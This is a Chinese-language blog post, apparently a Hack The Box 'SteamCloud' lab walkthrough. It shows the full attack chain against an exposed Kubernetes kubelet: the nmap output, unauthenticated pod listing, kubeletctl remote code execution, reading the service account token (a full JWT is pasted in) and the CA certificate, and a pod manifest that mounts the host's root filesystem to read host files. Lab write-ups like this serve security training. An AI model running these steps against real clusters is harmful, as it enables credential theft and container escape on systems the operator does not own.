官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
- 关注
本文由
创作,已纳入「FreeBuf原创奖励计划」,未授权禁止转载
steamcloud
1、先做一波信息搜集
─[sg-vip-2]─[10.10.14.3]─[yujiji@htb-nvhgx3u3nc]─[~]
└──╼ [★]$ nmap -p- -sV -sC 10.10.11.133
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-24 20:02 CST
Nmap scan report for 10.10.11.133
Host is up (0.22s latency).
Not shown: 65528 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 fc:fb:90:ee:7c:73:a1:d4:bf:87:f8:71:e8:44:c6:3c (RSA)
| 256 46:83:2b:1b:01:db:71:64:6a:3e:27:cb:53:6f:81:a1 (ECDSA)
|_ 256 1d:8d:d3:41:f3:ff:a4:37:e8:ac:78:08:89:c2:e3:c5 (ED25519)
2379/tcp open ssl/etcd-client?
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ h2
| ssl-cert: Subject: commonName=steamcloud
| Subject Alternative Name: DNS:localhost, DNS:steamcloud, IP Address:10.10.11.133, IP Address:127.0.0.1, IP Address:0:0:0:0:0:0:0:1
| Not valid before: 2025-02-25T01:35:01
|_Not valid after: 2026-02-25T01:35:01
2380/tcp open ssl/etcd-server?
| ssl-cert: Subject: commonName=steamcloud
| Subject Alternative Name: DNS:localhost, DNS:steamcloud, IP Address:10.10.11.133, IP Address:127.0.0.1, IP Address:0:0:0:0:0:0:0:1
| Not valid before: 2025-02-25T01:35:01
|_Not valid after: 2026-02-25T01:35:01
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ h2
8443/tcp open ssl/https-alt
| tls-alpn:
| h2
|_ http/1.1
|_http-title: Site doesn't have a title (application/json).
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=minikube/organizationName=system:masters
| Subject Alternative Name: DNS:minikubeCA, DNS:control-plane.minikube.internal, DNS:kubernetes.default.svc.cluster.local, DNS:kubernetes.default.svc, DNS:kubernetes.default, DNS:kubernetes, DNS:localhost, IP Address:10.10.11.133, IP Address:10.96.0.1, IP Address:127.0.0.1, IP Address:10.0.0.1
| Not valid before: 2025-02-24T01:35:00
|_Not valid after: 2028-02-25T01:35:00
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 403 Forbidden
| Audit-Id: d8808abb-21d4-471b-9069-6c9ff0eb8322
| Cache-Control: no-cache, private
| Content-Type: application/json
| X-Content-Type-Options: nosniff
| X-Kubernetes-Pf-Flowschema-Uid: f6660f84-f76e-465b-a612-d20291cfc6d4
| X-Kubernetes-Pf-Prioritylevel-Uid: 98d72d5f-910b-4675-9368-3e925212ea90
| Date: Tue, 25 Feb 2025 01:47:23 GMT
| Content-Length: 212
| {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User "system:anonymous" cannot get path "/nice ports,/Trinity.txt.bak"","reason":"Forbidden","details":{},"code":403}
| GetRequest:
| HTTP/1.0 403 Forbidden
| Audit-Id: 6346ac15-67b5-4c89-90a2-24cfc2412677
| Cache-Control: no-cache, private
| Content-Type: application/json
| X-Content-Type-Options: nosniff
| X-Kubernetes-Pf-Flowschema-Uid: f6660f84-f76e-465b-a612-d20291cfc6d4
| X-Kubernetes-Pf-Prioritylevel-Uid: 98d72d5f-910b-4675-9368-3e925212ea90
| Date: Tue, 25 Feb 2025 01:47:22 GMT
| Content-Length: 185
| {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User "system:anonymous" cannot get path "/"","reason":"Forbidden","details":{},"code":403}
| HTTPOptions:
| HTTP/1.0 403 Forbidden
| Audit-Id: 14b00b28-9ce5-4135-abde-e49d9726ab47
| Cache-Control: no-cache, private
| Content-Type: application/json
| X-Content-Type-Options: nosniff
| X-Kubernetes-Pf-Flowschema-Uid: f6660f84-f76e-465b-a612-d20291cfc6d4
| X-Kubernetes-Pf-Prioritylevel-Uid: 98d72d5f-910b-4675-9368-3e925212ea90
| Date: Tue, 25 Feb 2025 01:47:23 GMT
| Content-Length: 189
|_ {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User "system:anonymous" cannot options path "/"","reason":"Forbidden","details":{},"code":403}
10249/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
10250/tcp open ssl/http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
| ssl-cert: Subject: commonName=steamcloud@1740447302
| Subject Alternative Name: DNS:steamcloud
| Not valid before: 2025-02-25T00:35:02
|_Not valid after: 2026-02-25T00:35:02
| tls-alpn:
| h2
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
10256/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8443-TCP:V=7.94SVN%T=SSL%I=7%D=2/24%Time=67BD253E%P=x86_64-pc-linux
SF:-gnu%r(GetRequest,22F,"HTTP/1\.0\x20403\x20Forbidden\r\nAudit-Id:\x2063
SF:46ac15-67b5-4c89-90a2-24cfc2412677\r\nCache-Control:\x20no-cache,\x20pr
SF:ivate\r\nContent-Type:\x20application/json\r\nX-Content-Type-Options:\x
SF:20nosniff\r\nX-Kubernetes-Pf-Flowschema-Uid:\x20f6660f84-f76e-465b-a612
SF:-d20291cfc6d4\r\nX-Kubernetes-Pf-Prioritylevel-Uid:\x2098d72d5f-910b-46
SF:75-9368-3e925212ea90\r\nDate:\x20Tue,\x2025\x20Feb\x202025\x2001:47:22\
SF:x20GMT\r\nContent-Length:\x20185\r\n\r\n{\"kind\":\"Status\",\"apiVersi
SF:on\":\"v1\",\"metadata\":{},\"status\":\"Failure\",\"message\":\"forbid
SF:den:\x20User\x20\\\"system:anonymous\\\"\x20cannot\x20get\x20path\x20\\
SF:\"/\\\"\",\"reason\":\"Forbidden\",\"details\":{},\"code\":403}\n")%r(H
SF:TTPOptions,233,"HTTP/1\.0\x20403\x20Forbidden\r\nAudit-Id:\x2014b00b28-
SF:9ce5-4135-abde-e49d9726ab47\r\nCache-Control:\x20no-cache,\x20private\r
SF:\nContent-Type:\x20application/json\r\nX-Content-Type-Options:\x20nosni
SF:ff\r\nX-Kubernetes-Pf-Flowschema-Uid:\x20f6660f84-f76e-465b-a612-d20291
SF:cfc6d4\r\nX-Kubernetes-Pf-Prioritylevel-Uid:\x2098d72d5f-910b-4675-9368
SF:-3e925212ea90\r\nDate:\x20Tue,\x2025\x20Feb\x202025\x2001:47:23\x20GMT\
SF:r\nContent-Length:\x20189\r\n\r\n{\"kind\":\"Status\",\"apiVersion\":\"
SF:v1\",\"metadata\":{},\"status\":\"Failure\",\"message\":\"forbidden:\x2
SF:0User\x20\\\"system:anonymous\\\"\x20cannot\x20options\x20path\x20\\\"/
SF:\\\"\",\"reason\":\"Forbidden\",\"details\":{},\"code\":403}\n")%r(Four
SF:OhFourRequest,24A,"HTTP/1\.0\x20403\x20Forbidden\r\nAudit-Id:\x20d8808a
SF:bb-21d4-471b-9069-6c9ff0eb8322\r\nCache-Control:\x20no-cache,\x20privat
SF:e\r\nContent-Type:\x20application/json\r\nX-Content-Type-Options:\x20no
SF:sniff\r\nX-Kubernetes-Pf-Flowschema-Uid:\x20f6660f84-f76e-465b-a612-d20
SF:291cfc6d4\r\nX-Kubernetes-Pf-Prioritylevel-Uid:\x2098d72d5f-910b-4675-9
SF:368-3e925212ea90\r\nDate:\x20Tue,\x2025\x20Feb\x202025\x2001:47:23\x20G
SF:MT\r\nContent-Length:\x20212\r\n\r\n{\"kind\":\"Status\",\"apiVersion\"
SF::\"v1\",\"metadata\":{},\"status\":\"Failure\",\"message\":\"forbidden:
SF:\x20User\x20\\\"system:anonymous\\\"\x20cannot\x20get\x20path\x20\\\"/n
SF:ice\x20ports,/Trinity\.txt\.bak\\\"\",\"reason\":\"Forbidden\",\"detail
SF:s\":{},\"code\":403}\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 235.59 seconds
2、根据信息搜集结果,发现是k8s服务,查找相关内容
Kubelet 各个端口作用 10250_51CTO博客_kubelet 10250端口
3、通过curl 10250端口,发现了很多pods节点
curl -k [https://10.10.11.133:10250/pods](https://10.10.11.133:10250/pods) | jq .
4、使用kubeletctl列出所有节点
./kubeletctl_linux_amd64 pods --server 10.10.11.133
5、我们可以使用kubeletctl查看哪个pods可以进行rce
./kubeletctl_linux_amd64 --server 10.10.11.133 scan rce
6、对nginx进行rce执行
7、我们可以查看该nginx的token和certificates
./kubeletctl_linux_amd64 --server 10.10.11.133 --pod nginx --container nginx exec "cat /var/run/secrets/kubernetes.io/serviceaccount/token"
./kubeletctl_linux_amd64 --server 10.10.11.133 --pod nginx --container nginx exec "cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt"
8、我们使用得到的token和crt进行权限查看,通过kubectl工具
导入token:
export token="eyJhbGciOiJSUzI1NiIsImtpZCI6InZzZzhFMUw4eTZNYks1UGZPVmNXSGtFWHFENEhQTl9HZS1EZW5DR2JnbVkifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzcxOTg2MjY0LCJpYXQiOjE3NDA0NTAyNjQsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0IiwicG9kIjp7Im5hbWUiOiJuZ2lueCIsInVpZCI6ImUzMjA4NGRjLWFjNjAtNDFjNC04NjFhLTIxOGIyNGQxOTVhZiJ9LCJzZXJ2aWNlYWNjb3VudCI6eyJuYW1lIjoiZGVmYXVsdCIsInVpZCI6Ijg3MzYzZTA3LTQ1YWUtNDNlNC05NzA3LWFhMDY4MTlmMmU4ZCJ9LCJ3YXJuYWZ0ZXIiOjE3NDA0NTM4NzF9LCJuYmYiOjE3NDA0NTAyNjQsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpkZWZhdWx0OmRlZmF1bHQifQ.Nz5JZBNDpL0tPsU_sRpfKexSrhZXgkB3kdVx72v6efSfXDuwlBnRcKHcEnFyAKN1DAtAkL49qlFRbnPLAlOHAn0Gz0iu9_k_qe8VY-lBiVLe2WDefZhe5VlprQXg3ufgu8DVkD6-xOChsaqaouFVyJhNQvyFPKipknpomTk0mX5h-cRrhPERKD1A9hcF1zDoOVjKcfqAZn8cNbQ9NYc5ywD5uXXFa0P7Qw5ETJeXwTS8KGW4JbLidoSS05JAezNL5-iV6ZqS6uALSIzioEBub9oJdQkqbjPeMI5wRe-iG9S5hvwVrc6__4L29kw-Xoi42pbt6QbuIjuLra01yQgoDQ”
9、通过kubectl查看我们对于k8s的权限
kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 auth can-i --list
10、我们可以创建pods,那么后续的基本思路就是:创建一个自己的pods,然后将其挂载到物理机目录,然后访问即可
11、创建pods:
apiVersion: v1
kind: Pod
metadata:
name: nginxt
namespace: default
spec:
containers:
- name: nginxt
image: nginx:1.14.2
volumeMounts:
- mountPath: /root
name: mount-root-into-mnt
volumes:
- name: mount-root-into-mnt
hostPath:
path: /
automountServiceAccountToken: true
hostNetwork: true
kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 apply -f nginxt.yaml
通过get pods发现成功创建
kubeletctl --server 10.10.11.133 exec "cat /root/home/user/user.txt" -p nginxt -c
nginxt
通过kubeletctl直接进行命令执行即可
已在FreeBuf发表 0 篇文章
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
- 0 文章数
- 0 关注者